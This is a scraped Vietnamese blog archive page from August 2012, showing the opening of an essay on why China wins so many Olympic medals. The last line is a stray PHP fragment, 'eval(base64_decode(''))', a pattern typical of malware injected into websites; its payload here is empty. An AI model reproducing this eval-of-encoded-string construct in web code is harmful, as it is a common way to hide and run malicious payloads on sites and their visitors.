Archive for August 2nd, 2012

Lý do Trung Quốc đoạt nhiều huy chương Olympics

Lý do Trung Quốc đoạt nhiều huy chương Olympics

Hiến chương của tổ chức Thế Vận (Olympics) đề ra bảy nguyên tắc căn bản chi phối mọi hoạt động của tổ chức thể dục thể thao quốc tế này, trong đó điều thứ hai khẳng định “sử dụng thể thao như một phương tiện phát triển

08.2.2012 | Tiểu Luận- Chính Luận |

1 Comment

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>